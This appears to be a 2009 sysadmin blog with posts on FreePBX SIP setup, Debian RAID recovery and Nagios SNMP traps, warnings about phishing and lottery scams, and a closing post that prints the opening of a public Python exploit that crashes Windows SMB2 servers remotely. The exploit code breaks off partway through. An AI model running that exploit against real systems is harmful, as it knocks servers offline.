Saturday, December 12, 2009

Black progress bar when playing recordings from FreePBX website(s)

Just wanted to quickly write this tip.

When playing FreePBX recordings, or in general any QuickTime embedded video in a browser, the indicator bar renders all black, so the progress bar and controls cannot be seen.


This is somehow a bug in Windows 7 and/or Apple QuickTime. I’ve opened a support incident on Apple’s website and am waiting for a response.

The quick workaround for this is to run your browser in compatibility mode, such as Windows Vista (SP1 or SP2).

I personally don’t care, but some customers may raise an eyebrow. So those who want this “fix” can do the following.

How? Click the Windows Start button, find the affected browser shortcut (it must be a shortcut, not the exe itself), right-click it, choose Properties, open the Compatibility tab, enable compatibility mode and select Windows Vista (Service Pack 1 or 2), then restart the browser. You should see the bar now.


Cheers and have a good weekend.

Tuesday, December 8, 2009

trunking as a SIP client on asterisk via freepbx

Some of you may purchase a SIP service and be given a SIP extension by your SIP provider. This is not the same as a SIP trunk, where an “agreement” is made between two SIP servers; it is a typical SIP client account of the kind you would configure on a softphone or hardphone.

If you wish to make Asterisk the “client” that makes and receives calls on this account, you can do that easily with FreePBX, and this guide will show you how.

First, you need the SIP provider account: at minimum a username, a password and the IP address or hostname of the SIP provider, such as the Astervox service we at Astiostech provide.

This account will be used to make and receive calls through Asterisk; incoming calls will be forwarded to an internal SIP extension. From that extension you can send them to a queue or wherever else you wish.



Let’s say the Astervox (SIP provider) gives us an account like this:

Ext/User: 4000
Pass: 4000abc

Here’s how to get it working with FreePBX/Asterisk

1) Go to FreePBX, General settings and enable Inbound SIP calls

2) Create a new SIP trunk, name it anything you wish, and fill in the Outgoing Settings (this becomes the outbound trunk):
host=<yoursipproviderIPorName> [When using name, ensure you can resolve]
username=4000 [the sip account username]
secret=4000abc [the sip account password]
fromuser=4000 [this is your Asterisk IP or name or Dyndns]

3) For the inbound (incoming call) part, go to Register String, enter the authentication info again as below, followed by the extension to which incoming calls should be sent.

[Register String screenshot; its text is not preserved here]

/1001 is the internal extension that will be dialed when this SIP client, 4000, is called on the SIP provider (SIP bridging). Note that 1001 could also be handled by an Inbound Route, because 1001 is treated as a DID; with an inbound route you can do more routing with it.

4) Save and apply configuration in FreePBX

5) Define Outbound Routes so that you can dial via this Trunk

6) Define Inbound Routes if you want to send different CIDs to different destinations.

To check whether the registration and the peer are up, run at the command prompt:

# asterisk -rx "sip show registry"  [for our inbound; you should see State = Registered against your SIP provider]

# asterisk -rx "sip show peers"  [for our outbound; you should see Status = OK]

Remember! If you are behind NAT, you must forward UDP/5060 and UDP/10000 to 20000 to your internal Asterisk box, otherwise you may get one-way audio. Outbound rules may also be needed: at a minimum UDP/5060 plus the RTP range, which you should get from your provider; with Asterisk it is normally UDP 10000 to 20000.
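A small health check built on the two CLI commands above, added here as an example; it is not part of the original post and not FreePBX code. It parses constructed sample output in the Asterisk 1.4/1.6 column layout; the trunk name astervox and the provider hostname are assumptions, and on a live box you would feed it the real asterisk -rx output as in the comment at the end.

```shell
#!/bin/sh
# Added example: decide from "sip show registry" and "sip show peers" output
# whether the SIP-client trunk from the post is usable in both directions.

# Constructed sample output (not captured from a real system), in the
# column layout Asterisk 1.4/1.6 prints. Provider host and trunk name are assumed.
SAMPLE_REGISTRY='Host                            Username       Refresh State                Reg.Time
sip.astervox.example:5060       4000               105 Registered           Tue, 08 Dec 2009 10:01:22
1 SIP registrations.'
SAMPLE_PEERS='Name/username              Host            Dyn Nat ACL Port     Status
astervox/4000              203.0.113.10                 5060     OK (23 ms)
1 sip peers [Monitored: 1 online, 0 offline Unmonitored: 0 online, 0 offline]'

# registry_state <username>: reads "sip show registry" on stdin and prints the
# State column for that account ("Registered" is healthy), or "Missing".
registry_state() {
    awk -v user="$1" '
        $2 == user { print $4; found = 1 }
        END { if (!found) print "Missing" }'
}

# peer_status <trunkname>: reads "sip show peers" on stdin and prints the
# qualify status (OK, LAGGED, UNREACHABLE, UNKNOWN, Unmonitored) or "Missing".
# The peer column is "<trunk>/<username>", so match on the prefix.
peer_status() {
    awk -v peer="$1" '
        $1 == peer || index($1, peer "/") == 1 {
            for (i = 2; i <= NF; i++)
                if ($i ~ /^(OK|LAGGED|UNREACHABLE|UNKNOWN|Unmonitored)$/) {
                    print $i; found = 1; exit
                }
        }
        END { if (!found) print "Missing" }'
}

# check_trunk <registry text> <peers text> <username> <trunkname>
# Exit 0 only when inbound registration and outbound peer are both healthy,
# so it can be dropped straight into cron or a Nagios check.
check_trunk() {
    reg=$(printf '%s\n' "$1" | registry_state "$3")
    peer=$(printf '%s\n' "$2" | peer_status "$4")
    echo "registration=$reg peer=$peer"
    [ "$reg" = "Registered" ] && [ "$peer" = "OK" ]
}

# Live use on the PBX (not runnable here):
#   check_trunk "$(asterisk -rx 'sip show registry')" "$(asterisk -rx 'sip show peers')" 4000 astervox
```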


Friday, December 4, 2009

Debian software RAID made easy

In this guide, we will set up a mirrored pair of SATA disks straight from the Debian installer.

Go through the installer up to the Partition Disks stage. Select Manual and follow the rest of this guide.

1) Create the initial partition table by selecting each disk and answering yes to partition it. Do this on both disks.

2) Select the first FREE SPACE available.

3) Create the /boot, swap and / (root) partitions.

In our case, we will set up 2GB for /boot (boot flag enabled), 2GB for swap and the rest for / (root). We do not need to mirror swap, so this guide skips it and the RAID will only monitor and mirror /boot and / (root).

When partitioning, under Use as, select physical volume for RAID. See the screens below:


4) Select Use as.


5) Set the boot flag on for /boot on both disks when creating them. For swap and / (root) you don’t do that. Now set up swap and / (root) on both disks as well. Since swap is not RAIDed, when selecting Use as for the swap partition choose swap area instead. See below for the entire physical layout.

/boot – use as physical volume for RAID with boot flag on >> becomes sda1 or sdb1

swap – use as swap area >> becomes sda2 or sdb2

/ – use as physical volume for RAID >> becomes sda3 or sdb3


Important: we should have at least a boot, swap and root partition; do the same for any other partitions you want or have.

Enable the RAID virtual volumes

6) Now, select Configure RAID

7) Since we are enabling RAID for 2 partitions, we need to create two multidisk (MD) devices.


Select Create MD device.


Select RAID1 - Mirror


Select the number of active devices (for a mirror this is naturally 2); I select 2.


Select the number of spare devices if you have any; I select 0.


The first MD, md0, we assign to /boot, which is sda1 and sdb1. The second MD, md1, we assign to sda3 and sdb3. The diagram above shows md0 being set up; go through creating a new MD again, this time with the remaining unassigned partitions.

Configuring the RAID volumes

Once you’ve set it up correctly, your disk layout should look like this:


Notice we have RAID1 device 0, which is our /boot, and RAID1 device 1, which is our / (root).

8) Now in RAID device 0, select #1, set it up with Ext3 and select mount point /boot.


Now in RAID device 1, select #1, set it up with Ext3 and select mount point / (root).

9) Eventually the disk layout will look like this:


Besides the SCSI1 and SCSI2 devices, we now have RAID1 device 0 and device 1 with /boot and / (root) set up.

10) Finally, select Finish, continue the Debian setup to the end and reboot; you now have a RAID1 configuration.

PS: the installer might complain that the kernel does not know about this or that. Just continue.

After RAID
To check the status of your RAID, run

# cat /proc/mdstat

Disk recovery on software RAID
To resync a new disk (after a failure or whatever), you must do a couple of things: add the new disk’s partitions to the md0 and md1 volumes, and tell GRUB to install itself on the disk you just installed. Here’s how.

Assuming the first disk (sda) failed and we have replaced it and rebooted the server, here is what we need to do.

First, we copy the partition structure from sdb (the existing, non-failed disk) to sda (the new one):

# sfdisk -d /dev/sdb | sfdisk --force /dev/sda

Now we remove any existing RAID superblocks on this new drive (just in case):

# mdadm --zero-superblock /dev/sda1
# mdadm --zero-superblock /dev/sda2
# mdadm --zero-superblock /dev/sda3

[If you get an error, just ignore it; it means there were no existing RAID superblocks on the drive]

Now we add these partitions back to the RAID MD volumes according to the layout above (md0 is /boot on sda1/sdb1, md1 is / on sda3/sdb3; sda2 is swap and not part of any array):

# mdadm -a /dev/md0 /dev/sda1
# mdadm -a /dev/md1 /dev/sda3

Now we would like to watch the RAID resyncing:

# cat /proc/mdstat

After that, we must tell GRUB to install itself on the newly added disk.

# grub

[The grub command above drops you into the GRUB shell; once there, enter the following]

grub> root (hd0,0)
grub> setup (hd0)
grub> root (hd1,0)
grub> setup (hd1)
grub> quit

This sets up GRUB on hd0 and hd1; extend it accordingly if you run other RAID levels or have more disks.

That should get the recovered disk back up to speed. Before rebooting, ensure the disk sync is complete by repeatedly running

# cat /proc/mdstat


If /proc/mdstat still shows a recovery progress line, it’s still syncing. Don’t reboot until it is done.
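The "is it safe to reboot yet" decision above can be scripted. The following is an added example, not from the original post; it parses a constructed /proc/mdstat sample matching the two-array layout of this guide (md0 = /boot, md1 = /) and reports degraded and still-syncing arrays.

```shell
#!/bin/sh
# Added example: read /proc/mdstat and decide whether the mirrors are healthy
# and whether a rebuild is still running, so the reboot can be postponed safely.

# Constructed sample (not from a real box): md1 is rebuilding onto the new
# sda3, md0 is already clean.
SAMPLE_MDSTAT='Personalities : [raid1]
md1 : active raid1 sda3[2] sdb3[1]
      480000000 blocks [2/1] [_U]
      [==>..................]  recovery = 12.5% (60000000/480000000) finish=35.0min speed=200000K/sec

md0 : active raid1 sda1[0] sdb1[1]
      1951808 blocks [2/2] [UU]

unused devices: <none>'

# degraded_arrays: print each md device whose member map ([UU], [_U], ...)
# contains an underscore, i.e. a missing or failed mirror half. Reads stdin.
degraded_arrays() {
    awk '/^md[0-9]+ :/ { dev = $1 }
         match($0, /\[[U_]+]/) && index(substr($0, RSTART, RLENGTH), "_") { print dev }'
}

# syncing_arrays: print "<md> <percent>" for every array still
# resyncing, recovering, reshaping or checking. Reads stdin.
syncing_arrays() {
    awk '/^md[0-9]+ :/ { dev = $1 }
         /(resync|recovery|reshape|check) *= *[0-9.]+%/ {
             match($0, /[0-9.]+%/)
             print dev, substr($0, RSTART, RLENGTH - 1)
         }'
}

# safe_to_reboot: reads mdstat text on stdin; returns 0 when no array is
# degraded or syncing, 1 otherwise (and says why).
safe_to_reboot() {
    text=$(cat)
    d=$(printf '%s\n' "$text" | degraded_arrays)
    s=$(printf '%s\n' "$text" | syncing_arrays)
    rc=0
    [ -n "$d" ] && { echo "degraded: $d"; rc=1; }
    [ -n "$s" ] && { echo "syncing: $s"; rc=1; }
    [ $rc -eq 0 ] && echo "all arrays clean"
    return $rc
}

# Live use:  safe_to_reboot < /proc/mdstat
```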

Good luck.

Monday, November 16, 2009

choice: best SIP softphone for Windows

Ever used softphones that lock away many functions until you “unlock” them by purchasing the full version? Well, we all have, and we frown at those too. Softphones such as Zoiper and X-Lite are among the famous ones, but their free editions lack functionality such as call conferencing, forwarding, SIP over TCP, SIP over TLS, etc.
Well, after looking through *almost* all the softphones listed in this article, I found one that I would rate almost 9/10 for being FREE plus its functionality.
Here’s PhonerLite, winner of the list of softphones (without IM or video):

Yes, yes, it doesn’t have a fancy skin or 3D images here and there, but this piece of software does everything the other free ones want you to pay for. It lets you do conferencing, forwarding, SIP over TCP, SIP over TLS, IPv6, detailed logs, a phonebook and, yes, STATISTICS to see how good or bad the current connection is in real time. Wow, now that’s just awesome.
Those in a hurry to get it, here’s the link for downloads
There’s a BETA you can play around with and test. You can also run it straight off a portable device without installing anything, with this file
Installation is dead simple and straightforward. They even have a wizard to set up your account. One thing it lacks is automatic start, but that isn’t much hassle in Windows: just make a shortcut to the executable and drag it into the “Startup” folder in your Start menu.
If you do try it and wonder how to conference, it’s easy: when a call comes in, just hit the conference button, dial another extension (or as many as you wish) and everyone is conferencing.
To forward, when a call comes in, dial another extension, then drag and drop the current call onto the intended recipient. Be careful not to drag and drop many calls; this software is not intended to replace a receptionist system such as FOP or a receptionist board.

Sunday, November 8, 2009

Nagios Receive SNMP Traps (with SNMPTT)

SNMPTT (SNMP Trap Translator) works with snmptrapd: it receives traps, matches the IP of the sending host to a host in Nagios, and submits a passive check result for that host, which Nagios then uses to alert someone.
In the guide below:
[APC-UPS] –>send traps to–> [SNMPTRAPD –> SNMPTT –> NAGIOS]
Here’s a simple guide, adapted and made much more cut and dried (and a little simpler) from the guide found here.
We use Nagios 3.2.0, SNMPTT 1.3beta2 and Debian Lenny (5).
As usual, your feedback means a lot to us. Thanks!
Download some pre-reqs

The main component is SNMP (and some SNMP tools), so do this at the CLI:
apt-get install snmp snmpd libsnmp-dev
SNMPTT setup starts

1) apt-get install unzip

2) cd /usr/src
3) wget
4) unzip
5) cd Text-ParseWords-3.27
6) perl Makefile.PL
7) make test
8) make install
9) perl -MCPAN -e shell
At the CPAN shell, install the following modules:
install YAML
install Getopt::Long
install Config::IniFiles
install Time::HiRes
install Sys::Hostname
install Text::Balanced
install Sys::Syslog
install DBI
install DBD::mysql
install Crypt::DES
install Digest::MD5
install Digest::SHA1
install Digest::HMAC
install Net::SNMP

Download, install and configure snmptt (the magician)

10) cd /usr/src
11) wget
12) tar -zxvf snmptt_1.3beta2.tgz
13) cd snmptt_1.3beta2
14) cp snmptthandler /usr/sbin
15) cp snmptt /usr/sbin
16) cp snmpttconvert /usr/sbin
17) cp snmpttconvertmib /usr/sbin
Configure snmptrapd not to log traps but to hand them to snmptt
18) nano /etc/snmp/snmptrapd.conf

19) Enter the following lines:
traphandle default /usr/sbin/snmptt
disableAuthorization yes
donotlogtraps yes

Configure and enable snmptrapd as a service
20a) nano /etc/default/snmpd and /etc/init.d/snmpd

TRAPDOPTS='-On -Lsd -p /var/run/'

20b) /etc/init.d/snmpd start
21) netstat -an | grep "162"
>> You should see snmptrapd listening on UDP port 162

22) cd /usr/src/snmptt_1.3beta2
23) cp snmptt.ini /etc/snmp
24) nano /etc/snmp/snmptt.ini, look for and change the following setting:
net_snmp_perl_enable = 1

25) cd /usr/src/nagios-plugins-1.4.13/
26) mkdir /usr/local/nagios/libexec/eventhandlers
27) cd /usr/local/nagios/libexec/eventhandlers
28) wget
29) chmod +x submit_check_result
TESTING - Create sample to test
30) cd /usr/share/snmp/mibs
31) wget

32) snmpttconvertmib --in=PowerNet-MIB.mib --out=/etc/snmp/snmptt.conf.apcpower --exec='/usr/local/nagios/libexec/eventhandlers/submit_check_result $r TRAP 1'
In the line above, you can change TRAP to any name as long as it matches the service name in Nagios; 1 is the return code (0=OK, 1=WARNING, 2=CRITICAL, 3=UNKNOWN).
33) nano /etc/snmp/snmptt.ini
In [TrapFiles], add /etc/snmp/snmptt.conf.apcpower and comment out the default snmptt.conf.
Example: here we added /etc/snmp/snmptt.conf.apcpower, the output file of the snmpttconvertmib run above:

snmptt_conf_files = <<END
/etc/snmp/snmptt.conf.apcpower
END

Enable log rotation
34) nano /etc/logrotate.conf
Add the following entry at the end (the paths must match the log files created in the next steps; the rotation options are a sensible minimum):

/var/log/snmptt/snmptt.log /var/log/snmptt/snmpttunknown.log {
    weekly
    rotate 4
    compress
    missingok
}

35) mkdir /var/log/snmptt
36) touch /var/log/snmptt/snmptt.log
37) touch /var/log/snmptt/snmpttunknown.log
Configuring the hosts file
Traps carry the sender’s IP address, not its name, so we must add the name and IP of the device sending traps to /etc/hosts.

38) nano /etc/hosts
Add the following as a sample, sanjaypc
>> Important! This name must match the host_name in your hosts.cfg file in Nagios that will receive the traps.
Send a sample trap: load the same MIBs into a program like iReasoning MIB Browser and send a trap to your Nagios IP.

39) tail -f /var/log/snmptt/snmptt.log
Sun Nov 8 09:09:11 2009 . WARNING "Status Events" - APC UPS: On battery: The UPS has switched to battery backup power.

40) tail -f /var/log/messages --- output (after configuring the Nagios settings below, or at least having a host/service defined that matches sanjaypc and TRAP):
Nov 8 09:09:20 server1 nagios: PASSIVE SERVICE CHECK: sanjaypc;TRAP;1;APC UPS: On battery: The UPS has switched to battery backup power.
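The EXEC line generated in step 32 calls submit_check_result with the sending host ($r), the service name and a return code, and the syslog line above is what Nagios logs when that passive result arrives. The script below is an added example, not the submit_check_result shipped with Nagios or anything from the original post; it shows what such a handler has to produce and why trap text must be cleaned before it is written to the command pipe. The command-pipe path is the source-install default and is an assumption.

```shell
#!/bin/sh
# Added example: a minimal stand-in for the submit_check_result event handler
# that snmptt's EXEC line calls as "submit_check_result <host> TRAP <state>".
# NAGIOS_CMD is the Nagios external command pipe (assumed source-install path).
NAGIOS_CMD=${NAGIOS_CMD:-/usr/local/nagios/var/rw/nagios.cmd}

# format_passive_result <host> <service> <state 0-3> <plugin output> [epoch]
# Prints the PROCESS_SERVICE_CHECK_RESULT line in the shape Nagios parses
# (the "PASSIVE SERVICE CHECK" syslog line echoes the same fields back).
format_passive_result() {
    host=$1; svc=$2; state=$3; output=$4; now=${5:-$(date +%s)}
    case $state in
        0|1|2|3) ;;
        *) echo "state must be 0 (OK), 1 (WARNING), 2 (CRITICAL) or 3 (UNKNOWN), got '$state'" >&2
           return 2 ;;
    esac
    # The trap text comes from an untrusted network device: ';' separates
    # fields in the command file and a newline would start a second command,
    # so strip both before writing.
    output=$(printf '%s' "$output" | tr -d ';\n\r')
    printf '[%s] PROCESS_SERVICE_CHECK_RESULT;%s;%s;%s;%s\n' \
        "$now" "$host" "$svc" "$state" "$output"
}

# submit_check_result <host> <service> <state> <output> [epoch]
# Appends the formatted line to the command pipe (or a writable file, for testing).
submit_check_result() {
    line=$(format_passive_result "$@") || return $?
    if [ ! -p "$NAGIOS_CMD" ] && [ ! -w "$NAGIOS_CMD" ]; then
        echo "$NAGIOS_CMD: not the Nagios command pipe (is Nagios running?)" >&2
        return 1
    fi
    printf '%s\n' "$line" >> "$NAGIOS_CMD"
}

# Run as a script: pass the arguments from the snmptt EXEC line straight through.
if [ "$#" -ge 3 ]; then
    submit_check_result "$@"
fi
```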

Configuring Nagios - sample definitions

trap-service template

define service{
name generic-service
register 0
check_period 24x7
max_check_attempts 3
normal_check_interval 15
retry_check_interval 5
active_checks_enabled 1
passive_checks_enabled 0
parallelize_check 1
obsess_over_service 0
check_freshness 0
event_handler_enabled 0
flap_detection_enabled 0
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
notification_interval 60
notification_period 24x7
notification_options w,u,c,r
notifications_enabled 1
}

define service{
name trap-service
use generic-service
register 0
service_description TRAP
is_volatile 1
check_command check-host-alive
max_check_attempts 1
normal_check_interval 1
retry_check_interval 1
passive_checks_enabled 1
check_period none
notification_interval 0
contact_groups admins
}

Create the service for the host - NOTE: host_name must match the /etc/hosts entry we created earlier

define service{
host_name sanjaypc
use trap-service
contact_groups admins
}

41) Restart nagios
42) Send a trap again and check the Nagios web UI; the service should turn yellow [WARNING] and a notification should be sent out.

Nagios Send SNMP Traps

We hope this small guide helps you quickly set up sending SNMP traps out to a remote management host.
First, ensure that your Nagios box has the snmptrap binary and the other associated SNMP binaries installed. If you haven’t, a good start would be one of the following lines:
This guide was made using Nagios 3.2.0, Debian 5.
apt-get install snmp snmpd libsnmp-dev
yum install net-snmp net-snmp-utils net-snmp-devel -y
In Nagios, we set up SNMP traps to be sent to an HP OpenView box in our customer’s corporate network. These traps are sent as event handlers in Nagios. You may try doing them as normal notifications (I guess; haven’t tested).
So each time there is a state change (e.g. from OK to Warning), you get, besides the standard notifications, an event that triggers an SNMP trap to the remote management host.
To keep things simple, we use the existing config definitions such as the original commands.cfg and linux-services.cfg. The following guide attempts to send a trap when more than 2 or 3 users log onto the Nagios (localhost) box.
First, edit commands.cfg and add the following lines. I will explain what they mean.
define command{
   command_name send_snmptrap
   command_line /usr/bin/snmptrap -v 2c -c public '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"
}
Simply copy and paste everything; the command_line must be a single line, something like below.
The command name can be anything you wish, as long as it is referenced correctly in the _x_services.cfg files.
/usr/bin/snmptrap -v 2c -c public…
This is straightforward: here we attempt to send an SNMPv2c trap with the community string public to the remote server.
…'' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"
This part feeds the Nagios MIB so that we can use readable names such as nSvcDesc instead of numeric OIDs. It would be a good idea to give the Nagios MIB to the third-party remote monitoring host as well.
[EDIT: UPDATE: – The Nagios MIB has a wrong definition, or it’s actually meant for V2 of Nagios. Use this MIB, which should work for V3]
The next few fields are entirely up to you and what you want Nagios to put in the trap. In my case $HOSTNAME$ (the monitored host), $SERVICEDESC$ (the service description), $SERVICESTATEID$ (the Nagios state id: 0 for OK, 1 for warning, etc.) and $SERVICEOUTPUT$ (the additional info from the plug-in) are sufficient. You may add more where you deem necessary.
The macros ($name$) are well defined in the Nagios documentation. The n(typeID) names are found in the MIB file, so match them carefully. Some fields have been changed from Integer (i) to octet string (s), and this may cause your traps to fail. Whatever the case, you can simulate the trap at the CLI, for example
snmptrap -v 2c -c public '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcStateID s "$SERVICESTATEID$"
This will give errors because nSvcStateID in the MIB expects an Integer value, so changing the s to i will then work, and so on.
Now the command to send traps out is ready. Next we tell which service/host should execute this command on a state change (triggering the event handler).
Here’s a sample from my linux-services.cfg:
define service{
  use                         debian5-linuxservice
  host_name                   Nagios-Server
  service_description         Current Users
  event_handler               send_snmptrap
  event_handler_enabled       1
  check_command               check_local_users!2!3
}
NOTE: check_local_users thresholds are normally much higher, but for testing I made it warn at 2 users and go critical at 3.
The only two lines I added to the normal service definition are:
event_handler            send_snmptrap
event_handler_enabled    1

That’s all that is needed for hosts or services to send traps out with the configured output when a state change happens.
send_snmptrap is the logical name I created for that command in commands.cfg. Well, that’s about it. Simple, right? Now just restart Nagios to enable the configs above.
/etc/init.d/nagios restart
Then test the traps by submitting a passive check result in the Nagios web UI, for example Warning or Critical.
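One practical refinement of the event handler above: Nagios also runs event handlers on SOFT state changes (every retry up to max_check_attempts), so the one-line command_line will trap the NMS several times per incident. The wrapper below is an added example, not from the original post; it wraps the same snmptrap invocation, sends only on HARD changes and validates nSvcStateID. The script path, the receiver address 192.0.2.10 and the commands.cfg entry in the comment are assumptions.

```shell
#!/bin/sh
# Added example: event-handler wrapper around the snmptrap command from commands.cfg.
# Hypothetical commands.cfg entry that would call it (names are assumptions):
#   command_line /usr/local/nagios/libexec/eventhandlers/send_snmptrap.sh \
#       "$SERVICESTATETYPE$" "$HOSTNAME$" "$SERVICEDESC$" $SERVICESTATEID$ "$SERVICEOUTPUT$"
SNMPTRAP=${SNMPTRAP:-/usr/bin/snmptrap}
TRAP_DEST=${TRAP_DEST:-192.0.2.10}        # placeholder: the trap receiver (HP OpenView / iReasoning)
TRAP_COMMUNITY=${TRAP_COMMUNITY:-public}

# Nagios runs an event handler on SOFT state changes too; only a HARD
# change should page the NMS.
should_send() { [ "$1" = "HARD" ]; }

# nSvcStateID is an INTEGER in NAGIOS-NOTIFY-MIB: 0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN.
valid_state_id() { case $1 in 0|1|2|3) return 0 ;; *) return 1 ;; esac; }

# send_trap <HARD|SOFT> <host> <service> <state id> <plugin output>
send_trap() {
    statetype=$1; host=$2; svc=$3; stateid=$4; output=$5
    if ! should_send "$statetype"; then
        echo "skip: $statetype state"
        return 0
    fi
    if ! valid_state_id "$stateid"; then
        echo "bad state id: $stateid" >&2
        return 2
    fi
    # Receiver address, then '' (use the agent's own sysUpTime), then the
    # trap OID and the varbinds exactly as in the post's command_line.
    "$SNMPTRAP" -v 2c -c "$TRAP_COMMUNITY" "$TRAP_DEST" '' NAGIOS-NOTIFY-MIB::nSvcEvent \
        nSvcHostname s "$host" nSvcDesc s "$svc" \
        nSvcStateID i "$stateid" nSvcOutput s "$output"
}

# Run as a script: pass Nagios' five arguments straight through.
if [ "$#" -eq 5 ]; then
    send_trap "$@"
fi
```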
Also, if you would like to test receiving traps, I can recommend the free iReasoning SNMP toolset. There is a paid version if you like its rich features, but the free one, with limited functions, is enough here.
In iReasoning, launch the MIB Browser tool. Load the Nagios MIB to make things prettier: File >> Load MIBs and select NAGIOS-NOTIFY-MIB. Then click Tools >> Trap Receiver.
For the remote management host value, enter the IP where iReasoning is running. Ensure the Windows firewall allows incoming UDP port 162 for SNMP traps if you have it enabled.
Trigger something and see it work. See the sample from iReasoning below.
NOTE: whenever you change something in the config files, remember to restart Nagios.
Please do comment and give further suggestions.

Tuesday, October 13, 2009

Did someone ask you to update certificates? Well Don’t!

If you get a mail from just about anyone requesting you to update certificates on your computer: D.O.N.T.
The mail you get may look like this:

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
This is a new breed of social engineering that attempts to fool someone into “updating” their certificates, which in fact adds the attacker’s root certificate, so that every website, piece of software or anything else that uses a certificate chained to it is treated as VALID.
This then makes it much easier for someone to convince you that a site is actually the genuine web server, as there will be no prompt saying the certificate is invalid.
In Windows, only use Windows Update to update your root certificates. This is done securely by Microsoft, and MS is probably the party you can trust in this case.
If you receive this and think it could be from an internal IT team, it’s probably not the case. Get the facts and ask your IT department.

Saturday, September 26, 2009

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open a directly downloaded document in MS Word or Excel, all components within that document, such as internet links, scripts or procedures, may be enabled (depending on your security level).

One feature I really like in Office 2010 is that the software “knows” which Office documents were downloaded via the internet and marks them as “public/unsafe”.

Documents opened in Protected View (as it’s called) are prevented from executing malicious code by sandboxing the application, i.e. isolating its process.

When launching a document in this mode, Task Manager shows two winword.exe processes (the Microsoft Word executable). Presumably one is the original application running in normal mode, and the one with the smaller memory footprint is probably the sandboxed one (reduced functionality).


Once you accept to edit (see the ENABLE EDITING button at the top right), the document runs in the normal process and the so-called sandboxed version is no longer in memory.


Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. It helps users be protected automatically, view the content first (in case curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys get smarter. To avoid being tagged as spam, they send the main content as a Word document attachment, so it sailed past the Hotmail antispam service and right into my inbox. Anyway, just sharing with you how ridiculously funny this is.

To top that, it comes from a Yahoo address:




Dear Email Owner,

We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009.

Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash.

FILE NUMBER: MIC/903/KPC/0108308/09.

1. Your Full Names:

2. Your Country:

3. Telephone Number:

4. Occupation:

5. Age:

To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund.





Tel: +44-703-174-7509

Fax: +44-870-471-8189

Tel/Fax: +44- 844-774-4940

Contact Email:

WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements.

For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address:

Congratulations once again,

Mr. Evans Okoli.

Head Customer care Service

Microsoft Promotion Team

Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary.

© Copyright 2009 Microsoft Lottery promotion All Right Reserve"

Sunday, September 13, 2009

Forefront TMG NIS protects against SMB2.0 attacks

Microsoft added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company said that the protection against the critical zero-day vulnerability in SMB 2.0 was the first 0-day signature release ever for Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.
“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for the Vuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.
Want to try it out? Download here

Wednesday, September 9, 2009

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit for the SMB2 protocol (implemented in the newer Microsoft OSes) that can easily BSOD a Windows server or client remotely. SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used to identify the SMB dialect that will be used for further communication.


Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instant I pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang), just won’t boot anymore… F@!@@!!!… and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.


Also tried it on my x64 Windows 7 (also using SMB2.0) RTM Build 7600 but nothing happened. This means Microsoft was informed of the bug and fixed it in the RTM build.

All credits to Laurent Gaffié

Here’s the exploit code. You need to have File and Print Sharing enabled on Windows, and of course the firewall must allow File and Print Sharing from the network(s) you are in.

# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
